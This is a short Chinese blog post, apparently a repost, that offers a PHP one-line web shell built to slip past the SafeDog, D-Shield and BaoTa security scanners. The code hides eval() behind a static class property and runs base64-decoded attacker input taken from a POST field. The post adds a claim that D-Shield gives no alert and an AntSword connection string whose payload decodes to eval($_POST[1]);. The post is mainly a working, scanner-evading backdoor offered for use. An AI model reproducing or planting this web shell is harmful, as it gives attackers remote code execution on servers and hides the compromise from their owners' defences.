阅读 156

分享一个过狗过D盾过宝塔的php一句话木马

php
if(isset($_REQUEST[‘phpsessid‘])){
    class A { static $d;
    }
    class B extends A {

    }
    A::$d =base64_decode(substr($_POST[‘key‘],3));
    eval(B::$d);
}

?>

D盾查杀无提示

 

 

 

 

利用方法如图,实际就是「任意3个字符的前缀+base64编码的PHP代码」

 

 

中国蚁剑连接参数 key=aaaZXZhbCgkX1BPU1RbMV0pOw==&1

 

 

 

连接成功

 

 

原文:https://www.cnblogs.com/ta1zi/p/15234893.html
文章分类
代码人生
文章标签
宝塔
php
一句话
木马
版权声明:本站是系统测试站点,无实际运营。本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 XXXXXXo@163.com 举报,一经查实,本站将立刻删除。
相关推荐